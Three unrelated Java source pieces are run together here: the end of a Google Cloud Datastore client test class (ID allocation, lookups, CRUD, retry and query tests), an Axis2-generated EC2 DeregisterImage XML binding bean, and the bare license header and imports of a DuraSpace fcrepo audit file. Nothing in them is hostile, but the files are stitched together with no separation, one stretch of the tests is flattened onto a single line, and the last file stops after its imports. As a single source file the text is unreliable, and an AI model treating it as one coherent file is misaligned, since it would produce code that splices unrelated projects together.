    IncompleteKey pk1 = keyFactory.newKey();
    Key key1 = datastore.allocateId(pk1);
    assertEquals(key1.getProjectId(), pk1.getProjectId());
    assertEquals(key1.getNamespace(), pk1.getNamespace());
    assertEquals(key1.getAncestors(), pk1.getAncestors());
    assertEquals(key1.getKind(), pk1.getKind());
    assertTrue(key1.hasId());
    assertFalse(key1.hasName());
    assertEquals(Key.newBuilder(pk1, key1.getId()).build(), key1);
    Key key2 = datastore.allocateId(pk1);
    assertNotEquals(key1, key2);
    assertEquals(Key.newBuilder(pk1, key2.getId()).build(), key2);
    try {
      datastore.allocateId(key1);
      fail("Expecting a failure");
    } catch (IllegalArgumentException expected) {
      assertEquals(expected.getMessage(), "keys must be IncompleteKey instances");
    }
  }

  /** Varargs allocateId preserves input order and likewise rejects complete keys. */
  @Test
  public void testAllocateIdArray() {
    KeyFactory keyFactory = datastore.newKeyFactory().setKind(KIND1);
    IncompleteKey incompleteKey1 = keyFactory.newKey();
    IncompleteKey incompleteKey2 =
        keyFactory.setKind(KIND2).addAncestor(PathElement.of(KIND1, 10)).newKey();
    Key key3 = keyFactory.newKey("name");
    List<Key> result1 = datastore.allocateId(incompleteKey1, incompleteKey2, incompleteKey1);
    assertEquals(3, result1.size());
    assertEquals(Key.newBuilder(incompleteKey1, result1.get(0).getId()).build(), result1.get(0));
    assertEquals(Key.newBuilder(incompleteKey1, result1.get(2).getId()).build(), result1.get(2));
    assertEquals(Key.newBuilder(incompleteKey2, result1.get(1).getId()).build(), result1.get(1));
    try {
      datastore.allocateId(incompleteKey1, incompleteKey2, key3);
      fail("expecting a failure");
    } catch (IllegalArgumentException expected) {
      assertEquals(expected.getMessage(), "keys must be IncompleteKey instances");
    }
  }

  /** reserveIds issues exactly one ReserveIdsRequest carrying the key. */
  @Test
  public void testReserveIds() {
    ReserveIdsRequest reserveIdsRequest =
        ReserveIdsRequest.newBuilder().addKeys(KEY1.toPb()).build();
    EasyMock.expect(rpcMock.reserveIds(reserveIdsRequest))
        .andReturn(ReserveIdsResponse.newBuilder().build())
        .times(1);
    EasyMock.replay(rpcFactoryMock, rpcMock);
    Datastore datastore = rpcMockOptions.getService();
    datastore.reserveIds(KEY1);
    EasyMock.verify(rpcFactoryMock, rpcMock);
  }

  /** Interface-level check of reserveIds(Key...) against a mocked Datastore. */
  @Test
  public void testReserveIdsWithKeys() {
    Datastore datastore = createStrictMock(Datastore.class);
    EasyMock.expect(datastore.reserveIds(KEY1, KEY2)).andReturn(Arrays.asList(KEY1, KEY2));
    replay(datastore);
    List<Key> result = datastore.reserveIds(KEY1, KEY2);
    assertEquals(KEY1, result.get(0));
    assertEquals(KEY2, result.get(1));
    verify(datastore);
  }

  /** get() returns null for a missing key and preserves every typed property. */
  @Test
  public void testGet() {
    Entity entity = datastore.get(KEY3);
    assertNull(entity);
    entity = datastore.get(KEY1);
    assertEquals(ENTITY1, entity);
    StringValue value1 = entity.getValue("str");
    assertEquals(STR_VALUE, value1);
    BooleanValue value2 = entity.getValue("bool");
    assertEquals(BOOL_VALUE, value2);
    ListValue value3 = entity.getValue("list");
    assertEquals(LIST_VALUE2, value3);
    TimestampValue value4 = entity.getValue("date");
    assertEquals(TIMESTAMP_VALUE, value4);
    LatLngValue value5 = entity.getValue("latLng");
    assertEquals(LAT_LNG_VALUE, value5);
    FullEntity<IncompleteKey> value6 = entity.getEntity("partial1");
    assertEquals(PARTIAL_ENTITY1, value6);
    ListValue value7 = entity.getValue("emptyList");
    assertEquals(EMPTY_LIST_VALUE, value7);
    assertEquals(7, entity.getNames().size());
    assertFalse(entity.contains("bla"));
  }

  /** get/fetch with eventualConsistency all send EVENTUAL read options (3 lookups). */
  @Test
  public void testLookupEventualConsistency() {
    ReadOptions readOption =
        ReadOptions.newBuilder().setReadConsistencyValue(ReadConsistency.EVENTUAL_VALUE).build();
    com.google.datastore.v1.Key key =
        com.google.datastore.v1.Key.newBuilder()
            .setPartitionId(PartitionId.newBuilder().setProjectId(PROJECT_ID).build())
            .addPath(
                com.google.datastore.v1.Key.PathElement.newBuilder()
                    .setKind("kind1")
                    .setName("name")
                    .build())
            .build();
    LookupRequest lookupRequest =
        LookupRequest.newBuilder().setReadOptions(readOption).addKeys(key).build();
    EasyMock.expect(rpcMock.lookup(lookupRequest))
        .andReturn(LookupResponse.newBuilder().build())
        .times(3);
    EasyMock.replay(rpcFactoryMock, rpcMock);
    Datastore datastore = rpcMockOptions.getService();
    datastore.get(KEY1, ReadOption.eventualConsistency());
    datastore.get(ImmutableList.of(KEY1), ReadOption.eventualConsistency());
    datastore.fetch(ImmutableList.of(KEY1), ReadOption.eventualConsistency());
    EasyMock.verify(rpcFactoryMock, rpcMock);
  }

  /** Batched fetch preserves request order, with null holes for missing keys. */
  @Test
  public void testGetArrayNoDeferredResults() {
    datastore.put(ENTITY3);
    Iterator<Entity> result =
        datastore.fetch(KEY1, Key.newBuilder(KEY1).setName("bla").build(), KEY2, KEY3).iterator();
    assertEquals(ENTITY1, result.next());
    assertNull(result.next());
    assertEquals(ENTITY2, result.next());
    Entity entity3 = result.next();
    assertEquals(ENTITY3, entity3);
    assertTrue(entity3.isNull("null"));
    assertFalse(entity3.getBoolean("bool"));
    assertEquals(LIST_VALUE2.get(), entity3.getList("list"));
    FullEntity<IncompleteKey> partial1 = entity3.getEntity("partial1");
    FullEntity<IncompleteKey> partial2 = entity3.getEntity("partial2");
    assertEquals(PARTIAL_ENTITY2, partial1);
    assertEquals(ENTITY2, partial2);
    assertEquals(ValueType.BOOLEAN, entity3.getValue("bool").getType());
    assertEquals(LAT_LNG_VALUE, entity3.getValue("latLng"));
    assertEquals(EMPTY_LIST_VALUE, entity3.getValue("emptyList"));
    assertEquals(8, entity3.getNames().size());
    assertFalse(entity3.contains("bla"));
    try {
      entity3.getString("str");
      fail("Expecting a failure");
    } catch (DatastoreException expected) {
      // expected - no such property
    }
    assertFalse(result.hasNext());
  }

  /** get() follows deferred keys across extra lookup RPCs until all are resolved. */
  @Test
  public void testGetArrayDeferredResults() throws DatastoreException {
    Set<Key> requestedKeys = new HashSet<>();
    requestedKeys.add(KEY1);
    requestedKeys.add(KEY2);
    requestedKeys.add(KEY3);
    requestedKeys.add(KEY4);
    requestedKeys.add(KEY5);
    Iterator<Entity> iter = createDatastoreForDeferredLookup().get(KEY1, KEY2, KEY3, KEY4, KEY5);
    Set<Key> keysOfFoundEntities = new HashSet<>();
    while (iter.hasNext()) {
      keysOfFoundEntities.add(iter.next().getKey());
    }
    assertEquals(requestedKeys, keysOfFoundEntities);
  }

  /** fetch() additionally restores the original request order after deferrals. */
  @Test
  public void testFetchArrayDeferredResults() throws DatastoreException {
    List<Entity> foundEntities =
        createDatastoreForDeferredLookup().fetch(KEY1, KEY2, KEY3, KEY4, KEY5);
    assertEquals(foundEntities.get(0).getKey(), KEY1);
    assertEquals(foundEntities.get(1).getKey(), KEY2);
    assertEquals(foundEntities.get(2).getKey(), KEY3);
    assertEquals(foundEntities.get(3).getKey(), KEY4);
    assertEquals(foundEntities.get(4).getKey(), KEY5);
    assertEquals(foundEntities.size(), 5);
  }

  /**
   * Builds a mocked Datastore whose lookup responses defer keys twice: request 1
   * returns 2 entities and defers 3 keys, request 2 resolves 2 of those and
   * defers 1, request 3 resolves the last.
   */
  private Datastore createDatastoreForDeferredLookup() throws DatastoreException {
    List<com.google.datastore.v1.Key> keysPb = new ArrayList<>();
    keysPb.add(KEY1.toPb());
    keysPb.add(KEY2.toPb());
    keysPb.add(KEY3.toPb());
    keysPb.add(KEY4.toPb());
    keysPb.add(KEY5.toPb());
    List<LookupRequest> lookupRequests = new ArrayList<>();
    lookupRequests.add(LookupRequest.newBuilder().addAllKeys(keysPb).build());
    lookupRequests.add(
        LookupRequest.newBuilder()
            .addKeys(keysPb.get(1))
            .addKeys(keysPb.get(2))
            .addKeys(keysPb.get(4))
            .build());
    lookupRequests.add(LookupRequest.newBuilder().addKeys(keysPb.get(4)).build());
    Entity entity4 = Entity.newBuilder(KEY4).set("value", StringValue.of("value")).build();
    Entity entity5 = Entity.newBuilder(KEY5).set("value", "value").build();
    List<LookupResponse> lookupResponses = new ArrayList<>();
    lookupResponses.add(
        LookupResponse.newBuilder()
            .addFound(EntityResult.newBuilder().setEntity(ENTITY1.toPb()))
            .addFound(EntityResult.newBuilder().setEntity(entity4.toPb()))
            .addDeferred(keysPb.get(1))
            .addDeferred(keysPb.get(2))
            .addDeferred(keysPb.get(4))
            .build());
    lookupResponses.add(
        LookupResponse.newBuilder()
            .addFound(EntityResult.newBuilder().setEntity(ENTITY2.toPb()))
            .addFound(EntityResult.newBuilder().setEntity(ENTITY3.toPb()))
            .addDeferred(keysPb.get(4))
            .build());
    lookupResponses.add(
        LookupResponse.newBuilder()
            .addFound(EntityResult.newBuilder().setEntity(entity5.toPb()))
            .build());
    for (int i = 0; i < lookupRequests.size(); i++) {
      EasyMock.expect(rpcMock.lookup(lookupRequests.get(i))).andReturn(lookupResponses.get(i));
    }
    EasyMock.replay(rpcFactoryMock, rpcMock);
    return rpcMockOptions.getService();
  }

  /** add() rejects existing keys and completes incomplete keys on insert. */
  @Test
  public void testAddEntity() {
    List<Entity> keys = datastore.fetch(ENTITY1.getKey(), ENTITY3.getKey());
    assertEquals(ENTITY1, keys.get(0));
    assertNull(keys.get(1));
    assertEquals(2, keys.size());
    try {
      datastore.add(ENTITY1);
      fail("Expecting a failure");
    } catch (DatastoreException expected) {
      // expected;
    }
    List<Entity> entities = datastore.add(ENTITY3, PARTIAL_ENTITY1, PARTIAL_ENTITY2);
    assertEquals(ENTITY3, datastore.get(ENTITY3.getKey()));
    assertEquals(ENTITY3, entities.get(0));
    assertEquals(PARTIAL_ENTITY1.getProperties(), entities.get(1).getProperties());
    assertEquals(PARTIAL_ENTITY1.getKey().getAncestors(), entities.get(1).getKey().getAncestors());
    assertNotNull(datastore.get(entities.get(1).getKey()));
    assertEquals(PARTIAL_ENTITY2.getProperties(), entities.get(2).getProperties());
    assertEquals(PARTIAL_ENTITY2.getKey().getAncestors(), entities.get(2).getKey().getAncestors());
    assertNotNull(datastore.get(entities.get(2).getKey()));
  }

  /** update() fails for a missing key and overwrites an existing entity. */
  @Test
  public void testUpdate() {
    List<Entity> keys = datastore.fetch(ENTITY1.getKey(), ENTITY3.getKey());
    assertEquals(ENTITY1, keys.get(0));
    assertNull(keys.get(1));
    assertEquals(2, keys.size());
    try {
      datastore.update(ENTITY3);
      fail("Expecting a failure");
    } catch (DatastoreException expected) {
      // expected;
    }
    datastore.add(ENTITY3);
    assertEquals(ENTITY3, datastore.get(ENTITY3.getKey()));
    Entity entity3 = Entity.newBuilder(ENTITY3).clear().set("bla", new NullValue()).build();
    assertNotEquals(ENTITY3, entity3);
    datastore.update(entity3);
    assertEquals(entity3, datastore.get(ENTITY3.getKey()));
  }

  /** put() upserts: creates or replaces, and completes incomplete keys. */
  @Test
  public void testPut() {
    Entity updatedEntity = Entity.newBuilder(ENTITY1).set("new_property", 42L).build();
    assertEquals(updatedEntity, datastore.put(updatedEntity));
    assertEquals(updatedEntity, datastore.get(updatedEntity.getKey()));
    Entity entity2 = Entity.newBuilder(ENTITY2).clear().set("bla", new NullValue()).build();
    assertNotEquals(ENTITY2, entity2);
    List<Entity> entities = datastore.put(ENTITY1, entity2, ENTITY3, PARTIAL_ENTITY1);
    assertEquals(ENTITY1, entities.get(0));
    assertEquals(entity2, entities.get(1));
    assertEquals(ENTITY3, entities.get(2));
    assertEquals(PARTIAL_ENTITY1.getProperties(), entities.get(3).getProperties());
    assertEquals(PARTIAL_ENTITY1.getKey().getAncestors(), entities.get(3).getKey().getAncestors());
    assertEquals(ENTITY1, datastore.get(ENTITY1.getKey()));
    assertEquals(entity2, datastore.get(entity2.getKey()));
    assertEquals(ENTITY3, datastore.get(ENTITY3.getKey()));
    Entity entity = datastore.get(entities.get(3).getKey());
    assertEquals(entities.get(3), entity);
  }

  /** delete() is idempotent: deleting missing keys succeeds silently. */
  @Test
  public void testDelete() {
    Iterator<Entity> keys =
        datastore.fetch(ENTITY1.getKey(), ENTITY2.getKey(), ENTITY3.getKey()).iterator();
    assertEquals(ENTITY1, keys.next());
    assertEquals(ENTITY2, keys.next());
    assertNull(keys.next());
    assertFalse(keys.hasNext());
    datastore.delete(ENTITY1.getKey(), ENTITY2.getKey(), ENTITY3.getKey());
    keys = datastore.fetch(ENTITY1.getKey(), ENTITY2.getKey(), ENTITY3.getKey()).iterator();
    assertNull(keys.next());
    assertNull(keys.next());
    assertNull(keys.next());
    assertFalse(keys.hasNext());
  }

  /** KeyFactory builds keys consistent with the fixture key constants. */
  @Test
  public void testKeyFactory() {
    KeyFactory keyFactory = datastore.newKeyFactory().setKind(KIND1);
    assertEquals(INCOMPLETE_KEY1, keyFactory.newKey());
    assertEquals(
        IncompleteKey.newBuilder(INCOMPLETE_KEY1).setKind(KIND2).build(),
        datastore.newKeyFactory().setKind(KIND2).newKey());
    assertEquals(KEY1, keyFactory.newKey("name"));
    assertEquals(Key.newBuilder(KEY1).setId(2).build(), keyFactory.newKey(2));
  }

  /** A retryable UNAVAILABLE error is transparently retried and then succeeds. */
  @Test
  public void testRetryableException() {
    LookupRequest requestPb = LookupRequest.newBuilder().addKeys(KEY1.toPb()).build();
    LookupResponse responsePb =
        LookupResponse.newBuilder()
            .addFound(EntityResult.newBuilder().setEntity(ENTITY1.toPb()))
            .build();
    EasyMock.expect(rpcMock.lookup(requestPb))
        .andThrow(new DatastoreException(14, "UNAVAILABLE", "UNAVAILABLE", null))
        .andReturn(responsePb);
    EasyMock.replay(rpcFactoryMock, rpcMock);
    Datastore datastore = rpcMockOptions.getService();
    Entity entity = datastore.get(KEY1);
    assertEquals(ENTITY1, entity);
EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testRetryableExceptionForOperationWithTxn() { ByteString txnBytes = ByteString.copyFromUtf8("txn1"); LookupRequest requestPb = LookupRequest.newBuilder() .addKeys(KEY1.toPb()) .setReadOptions(ReadOptions.newBuilder().setTransaction(txnBytes).build()) .build(); LookupResponse responsePb = LookupResponse.newBuilder() .addFound(EntityResult.newBuilder().setEntity(ENTITY1.toPb())) .build(); EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class))) .andReturn(BeginTransactionResponse.newBuilder().setTransaction(txnBytes).build()); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow(new DatastoreException(14, "UNAVAILABLE", "UNAVAILABLE", null)) .andReturn(responsePb); EasyMock.replay(rpcFactoryMock, rpcMock); Datastore datastore = rpcMockOptions.getService(); Transaction transaction = datastore.newTransaction(); Entity entity = transaction.get(KEY1); assertEquals(ENTITY1, entity); EasyMock.verify(rpcFactoryMock, rpcMock); } @Test public void testNonRetryableExceptionForOperationWithTxn() { ByteString txnBytes = ByteString.copyFromUtf8("txn1"); LookupRequest requestPb = LookupRequest.newBuilder() .addKeys(KEY1.toPb()) .setReadOptions(ReadOptions.newBuilder().setTransaction(txnBytes).build()) .build(); EasyMock.expect(rpcMock.beginTransaction(EasyMock.anyObject(BeginTransactionRequest.class))) .andReturn(BeginTransactionResponse.newBuilder().setTransaction(txnBytes).build()); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow(new DatastoreException(10, "ABORTED", "ABORTED", null)) .times(1); EasyMock.replay(rpcFactoryMock, rpcMock); try { Datastore datastore = rpcMockOptions.getService(); Transaction transaction = datastore.newTransaction(); transaction.get(KEY1); Assert.fail(); EasyMock.verify(rpcFactoryMock, rpcMock); } catch (DatastoreException ex) { assertEquals("ABORTED", ex.getMessage()); } } @Test public void testNonRetryableException() { LookupRequest requestPb = 
LookupRequest.newBuilder().addKeys(KEY1.toPb()).build(); EasyMock.expect(rpcMock.lookup(requestPb)) .andThrow( new DatastoreException(DatastoreException.UNKNOWN_CODE, "denied", "PERMISSION_DENIED")) .times(1); EasyMock.replay(rpcFactoryMock, rpcMock); try { Datastore datastore = rpcMockOptions.getService(); datastore.get(KEY1); Assert.fail(); EasyMock.verify(rpcFactoryMock, rpcMock); } catch (DatastoreException ex) { assertEquals("denied", ex.getMessage()); } } @Test public void testRuntimeException() { LookupRequest requestPb = LookupRequest.newBuilder().addKeys(KEY1.toPb()).build(); String exceptionMessage = "Artificial runtime exception"; EasyMock.expect(rpcMock.lookup(requestPb)).andThrow(new RuntimeException(exceptionMessage)); EasyMock.replay(rpcFactoryMock, rpcMock); try { Datastore datastore = rpcMockOptions.getService(); datastore.get(KEY1); Assert.fail(); EasyMock.verify(rpcFactoryMock, rpcMock); } catch (DatastoreException ex) { assertEquals(exceptionMessage, ex.getCause().getMessage()); } } @Test public void testGqlQueryWithNullBinding() { Query<Entity> query = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND1) .setNullBinding("name") .build(); Iterator<Entity> results = datastore.run(query); assertTrue(results.hasNext()); assertEquals(ENTITY1, results.next()); assertFalse(results.hasNext()); Query<Entity> gqlQuery = Query.newGqlQueryBuilder(ResultType.ENTITY, "select * from " + KIND1) .setNullBinding("name") .build(); Iterator<Entity> queryResults = datastore.run(gqlQuery); int count = 0; while (queryResults.hasNext()) { queryResults.next(); count++; } assertEquals(1, count); } @Test public void testQueryWithStartCursor() { Entity entity1 = Entity.newBuilder(Key.newBuilder(PROJECT_ID, KIND1, "name-01").build()).build(); Entity entity2 = Entity.newBuilder(Key.newBuilder(PROJECT_ID, KIND1, "name-02").build()).build(); Entity entity3 = Entity.newBuilder(Key.newBuilder(PROJECT_ID, KIND1, "name-03").build()).build(); 
datastore.put(entity1, entity2, entity3); QueryResults<Entity> run1 = datastore.run(Query.newEntityQueryBuilder().setKind(KIND1).build()); run1.next(); Cursor cursor1 = run1.getCursorAfter(); assertNotNull(cursor1); QueryResults<Entity> run2 = datastore.run(Query.newEntityQueryBuilder().setKind(KIND1).setStartCursor(cursor1).build()); Cursor cursor2 = run2.getCursorAfter(); assertNotNull(cursor2); assertEquals(cursor2, cursor1); datastore.delete(entity1.getKey(), entity2.getKey(), entity3.getKey()); } }
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements.  See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership.  The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License.  You may obtain a copy of the License at
//
//   http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied.  See the License for the
// specific language governing permissions and limitations
// under the License.

/**
 * DeregisterImage.java
 *
 * This file was auto-generated from WSDL
 * by the Apache Axis2 version: 1.5.6  Built on : Aug 30, 2011 (10:01:01 CEST)
 */

package com.amazon.ec2;

/**
 * DeregisterImage bean class.
 *
 * Axis2 ADB (Axis Data Binding) wrapper for the EC2 {@code DeregisterImage}
 * request element.  It holds a single {@code DeregisterImageType} payload and
 * knows how to serialize itself to / parse itself from an XML stream.
 *
 * NOTE: this class is generated code; the helper methods below are the
 * standard ADB boilerplate and should not be hand-edited beyond comments.
 */
public class DeregisterImage implements org.apache.axis2.databinding.ADBBean {

    // Qualified name of the XML element this bean maps to.
    public static final javax.xml.namespace.QName MY_QNAME = new javax.xml.namespace.QName(
            "http://ec2.amazonaws.com/doc/2012-08-15/",
            "DeregisterImage",
            "ns1");

    // Returns the canonical prefix for the EC2 namespace, or a fresh unique
    // prefix for any other namespace.
    private static java.lang.String generatePrefix(java.lang.String namespace) {
        if(namespace.equals("http://ec2.amazonaws.com/doc/2012-08-15/")){
            return "ns1";
        }
        return org.apache.axis2.databinding.utils.BeanUtil.getUniquePrefix();
    }

    /**
     * field for DeregisterImage
     */
    protected com.amazon.ec2.DeregisterImageType localDeregisterImage ;

    /**
     * Auto generated getter method
     * @return com.amazon.ec2.DeregisterImageType
     */
    public com.amazon.ec2.DeregisterImageType getDeregisterImage(){
        return localDeregisterImage;
    }

    /**
     * Auto generated setter method
     * @param param DeregisterImage
     */
    public void setDeregisterImage(com.amazon.ec2.DeregisterImageType param){
        this.localDeregisterImage=param;
    }

    /**
     * isReaderMTOMAware
     * @return true if the reader supports MTOM
     */
    public static boolean isReaderMTOMAware(javax.xml.stream.XMLStreamReader reader) {
        boolean isReaderMTOMAware = false;
        try{
            // StAX readers that are not MTOM-aware throw IllegalArgumentException
            // for this property, which we translate to "not aware".
            isReaderMTOMAware = java.lang.Boolean.TRUE.equals(reader.getProperty(org.apache.axiom.om.OMConstants.IS_DATA_HANDLERS_AWARE));
        }catch(java.lang.IllegalArgumentException e){
            isReaderMTOMAware = false;
        }
        return isReaderMTOMAware;
    }

    /**
     * Wraps this bean in a lazily-serialized OM element.
     *
     * @param parentQName
     * @param factory
     * @return org.apache.axiom.om.OMElement
     */
    public org.apache.axiom.om.OMElement getOMElement (
            final javax.xml.namespace.QName parentQName,
            final org.apache.axiom.om.OMFactory factory) throws org.apache.axis2.databinding.ADBException{

        // The data source defers serialization until the element is actually
        // written out, delegating back to this bean's serialize method.
        org.apache.axiom.om.OMDataSource dataSource =
                new org.apache.axis2.databinding.ADBDataSource(this,MY_QNAME){

            public void serialize(org.apache.axis2.databinding.utils.writer.MTOMAwareXMLStreamWriter xmlWriter)
                    throws javax.xml.stream.XMLStreamException {
                DeregisterImage.this.serialize(MY_QNAME,factory,xmlWriter);
            }
        };
        return new org.apache.axiom.om.impl.llom.OMSourcedElementImpl(
                MY_QNAME,factory,dataSource);
    }

    // Convenience overload; serializes without emitting an xsi:type.
    public void serialize(final javax.xml.namespace.QName parentQName,
            final org.apache.axiom.om.OMFactory factory,
            org.apache.axis2.databinding.utils.writer.MTOMAwareXMLStreamWriter xmlWriter)
            throws javax.xml.stream.XMLStreamException, org.apache.axis2.databinding.ADBException{
        serialize(parentQName,factory,xmlWriter,false);
    }

    // Writes this bean as XML.  The payload is mandatory; a null payload is an
    // ADB error because the wrapped element cannot be empty.
    public void serialize(final javax.xml.namespace.QName parentQName,
            final org.apache.axiom.om.OMFactory factory,
            org.apache.axis2.databinding.utils.writer.MTOMAwareXMLStreamWriter xmlWriter,
            boolean serializeType)
            throws javax.xml.stream.XMLStreamException, org.apache.axis2.databinding.ADBException{

        //We can safely assume an element has only one type associated with it
        if (localDeregisterImage==null){
            throw new org.apache.axis2.databinding.ADBException("Property cannot be null!");
        }
        localDeregisterImage.serialize(MY_QNAME,factory,xmlWriter);
    }

    /**
     * Util method to write an attribute with the ns prefix
     */
    private void writeAttribute(java.lang.String prefix,java.lang.String namespace,java.lang.String attName,
            java.lang.String attValue,javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException{
        // Bind the prefix first if this namespace has not been declared yet.
        if (xmlWriter.getPrefix(namespace) == null) {
            xmlWriter.writeNamespace(prefix, namespace);
            xmlWriter.setPrefix(prefix, namespace);
        }
        xmlWriter.writeAttribute(namespace,attName,attValue);
    }

    /**
     * Util method to write an attribute without the ns prefix
     */
    private void writeAttribute(java.lang.String namespace,java.lang.String attName,
            java.lang.String attValue,javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException{
        if (namespace.equals("")) {
            // No namespace: plain unqualified attribute.
            xmlWriter.writeAttribute(attName,attValue);
        } else {
            registerPrefix(xmlWriter, namespace);
            xmlWriter.writeAttribute(namespace,attName,attValue);
        }
    }

    /**
     * Util method to write a QName-valued attribute without the ns prefix.
     * The QName's own namespace is registered so the lexical value can carry
     * a "prefix:localPart" form.
     */
    private void writeQNameAttribute(java.lang.String namespace, java.lang.String attName,
            javax.xml.namespace.QName qname, javax.xml.stream.XMLStreamWriter xmlWriter)
            throws javax.xml.stream.XMLStreamException {

        java.lang.String attributeNamespace = qname.getNamespaceURI();
        java.lang.String attributePrefix = xmlWriter.getPrefix(attributeNamespace);
        if (attributePrefix == null) {
            attributePrefix = registerPrefix(xmlWriter, attributeNamespace);
        }
        java.lang.String attributeValue;
        if (attributePrefix.trim().length() > 0) {
            attributeValue = attributePrefix + ":" + qname.getLocalPart();
        } else {
            attributeValue = qname.getLocalPart();
        }

        if (namespace.equals("")) {
            xmlWriter.writeAttribute(attName, attributeValue);
        } else {
            registerPrefix(xmlWriter, namespace);
            xmlWriter.writeAttribute(namespace, attName, attributeValue);
        }
    }

    /**
     * method to handle Qnames
     */
    private void writeQName(javax.xml.namespace.QName qname,
            javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException {
        java.lang.String namespaceURI = qname.getNamespaceURI();
        if (namespaceURI != null) {
            java.lang.String prefix = xmlWriter.getPrefix(namespaceURI);
            if (prefix == null) {
                prefix = generatePrefix(namespaceURI);
                xmlWriter.writeNamespace(prefix, namespaceURI);
                xmlWriter.setPrefix(prefix,namespaceURI);
            }

            if (prefix.trim().length() > 0){
                xmlWriter.writeCharacters(prefix + ":" + org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qname));
            } else {
                // i.e this is the default namespace
                xmlWriter.writeCharacters(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qname));
            }
        } else {
            xmlWriter.writeCharacters(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qname));
        }
    }

    // Writes an array of QNames as a space-separated list of lexical values,
    // declaring any needed namespace prefixes along the way.
    private void writeQNames(javax.xml.namespace.QName[] qnames,
            javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException {

        if (qnames != null) {
            // we have to store this data until last moment since it is not possible to write any
            // namespace data after writing the charactor data
            java.lang.StringBuffer stringToWrite = new java.lang.StringBuffer();
            java.lang.String namespaceURI = null;
            java.lang.String prefix = null;

            for (int i = 0; i < qnames.length; i++) {
                if (i > 0) {
                    stringToWrite.append(" ");
                }
                namespaceURI = qnames[i].getNamespaceURI();
                if (namespaceURI != null) {
                    prefix = xmlWriter.getPrefix(namespaceURI);
                    if ((prefix == null) || (prefix.length() == 0)) {
                        prefix = generatePrefix(namespaceURI);
                        xmlWriter.writeNamespace(prefix, namespaceURI);
                        xmlWriter.setPrefix(prefix,namespaceURI);
                    }

                    if (prefix.trim().length() > 0){
                        stringToWrite.append(prefix).append(":").append(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qnames[i]));
                    } else {
                        stringToWrite.append(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qnames[i]));
                    }
                } else {
                    stringToWrite.append(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qnames[i]));
                }
            }
            xmlWriter.writeCharacters(stringToWrite.toString());
        }
    }

    /**
     * Register a namespace prefix
     */
    private java.lang.String registerPrefix(javax.xml.stream.XMLStreamWriter xmlWriter,
            java.lang.String namespace) throws javax.xml.stream.XMLStreamException {
        java.lang.String prefix = xmlWriter.getPrefix(namespace);
        if (prefix == null) {
            prefix = generatePrefix(namespace);
            // Keep generating until we find a prefix not already bound in the
            // writer's namespace context.
            while (xmlWriter.getNamespaceContext().getNamespaceURI(prefix) != null) {
                prefix = org.apache.axis2.databinding.utils.BeanUtil.getUniquePrefix();
            }
            xmlWriter.writeNamespace(prefix, namespace);
            xmlWriter.setPrefix(prefix, namespace);
        }
        return prefix;
    }

    /**
     * databinding method to get an XML representation of this object
     *
     */
    public javax.xml.stream.XMLStreamReader getPullParser(javax.xml.namespace.QName qName)
            throws org.apache.axis2.databinding.ADBException{

        //We can safely assume an element has only one type associated with it
        // Delegates to the payload; will NPE if the payload was never set —
        // NOTE(review): generated code does not guard this, unlike serialize().
        return localDeregisterImage.getPullParser(MY_QNAME);
    }

    /**
     *  Factory class that keeps the parse method
     */
    public static class Factory{

        /**
         * static method to create the object
         * Precondition:  If this object is an element, the current or next start element starts this object and any intervening reader events are ignorable
         *                If this object is not an element, it is a complex type and the reader is at the event just after the outer start element
         * Postcondition: If this object is an element, the reader is positioned at its end element
         *                If this object is a complex type, the reader is positioned at the end element of its outer element
         */
        public static DeregisterImage parse(javax.xml.stream.XMLStreamReader reader) throws java.lang.Exception{
            DeregisterImage object = new DeregisterImage();

            int event;
            java.lang.String nillableValue = null;
            java.lang.String prefix ="";
            java.lang.String namespaceuri ="";
            try {
                // Advance to the first start/end element.
                while (!reader.isStartElement() && !reader.isEndElement())
                    reader.next();

                // Note all attributes that were handled. Used to differ normal attributes
                // from anyAttributes.
                java.util.Vector handledAttributes = new java.util.Vector();

                while(!reader.isEndElement()) {
                    if (reader.isStartElement() ){
                        if (reader.isStartElement() && new javax.xml.namespace.QName("http://ec2.amazonaws.com/doc/2012-08-15/","DeregisterImage").equals(reader.getName())){
                            // Expected payload element: hand off to the inner type's parser.
                            object.setDeregisterImage(com.amazon.ec2.DeregisterImageType.Factory.parse(reader));
                        }  // End of if for expected property start element
                        else{
                            // A start element we are not expecting indicates an invalid parameter was passed
                            throw new org.apache.axis2.databinding.ADBException("Unexpected subelement " + reader.getLocalName());
                        }
                    } else {
                        reader.next();
                    }
                }  // end of while loop

            } catch (javax.xml.stream.XMLStreamException e) {
                throw new java.lang.Exception(e);
            }

            return object;
        }

    }//end of factory class

}
/**
 * Copyright 2015 DuraSpace, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.fcrepo.audit;

import static com.hp.hpl.jena.datatypes.xsd.XSDDatatype.XSDdateTime;
import static com.hp.hpl.jena.datatypes.xsd.XSDDatatype.XSDstring;
